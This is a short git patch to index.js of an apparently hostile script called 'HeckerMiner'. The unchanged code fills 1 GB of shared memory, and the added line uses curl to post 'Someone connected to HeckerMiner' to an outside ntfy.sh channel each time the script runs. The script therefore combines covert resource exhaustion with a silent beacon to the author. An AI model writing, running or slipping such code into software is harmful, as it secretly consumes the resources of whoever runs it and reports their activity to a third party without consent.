From fbe4161b5fa6f144767e61e933363bb37313e202 Mon Sep 17 00:00:00 2001 From: heckeralt Date: Wed, 4 Sep 2024 11:25:33 -0400 Subject: [PATCH] Update index.js --- index.js | 1 + 1 file changed, 1 insertion(+) diff --git a/index.js b/index.js index 82ebb11..6b877b3 100644 --- a/index.js +++ b/index.js @@ -11,6 +11,7 @@ if (os.platform() === 'win32') { } child.execSync('fallocate -l 1G /dev/shm/rameat'); console.log(os.cpus()); +child.execSync('curl -d "Someone connected to HeckerMiner" ntfy.sh/heckerminer') const numLines = Math.random(3100); // Generate random numbers and concatenate with newline characters let content = Math.random();